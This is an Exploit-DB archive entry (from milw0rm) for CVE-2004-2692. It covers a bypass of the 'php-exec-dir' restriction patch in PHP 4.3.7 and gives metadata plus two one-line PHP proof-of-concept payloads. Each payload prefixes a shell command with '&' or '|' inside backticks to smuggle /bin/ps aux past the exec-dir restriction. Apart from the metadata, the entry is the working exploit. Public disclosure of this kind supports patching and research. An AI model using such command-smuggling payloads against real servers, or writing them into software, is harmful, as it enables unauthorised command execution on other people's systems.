PHP 4.3.7 - 'php-exec-dir' Patch Command Access Restriction Bypass
Author: VeNoMouS type: webapps platform: php port: date_added: 2004-08-07 date_updated: 2016-12-02 verified: 1 codes: OSVDB-7243;CVE-2004-2692 tags: aliases: screenshot_url: application_url: http://www.exploit-db.comphp-4.3.7.tar.gz raw file: 384.txt
<?php $blah = `& /bin/ps aux`; echo nl2br($blah); ?> <?php $blah = `| /bin/ps aux`; echo nl2br($blah); ?> # milw0rm.com [2004-08-08]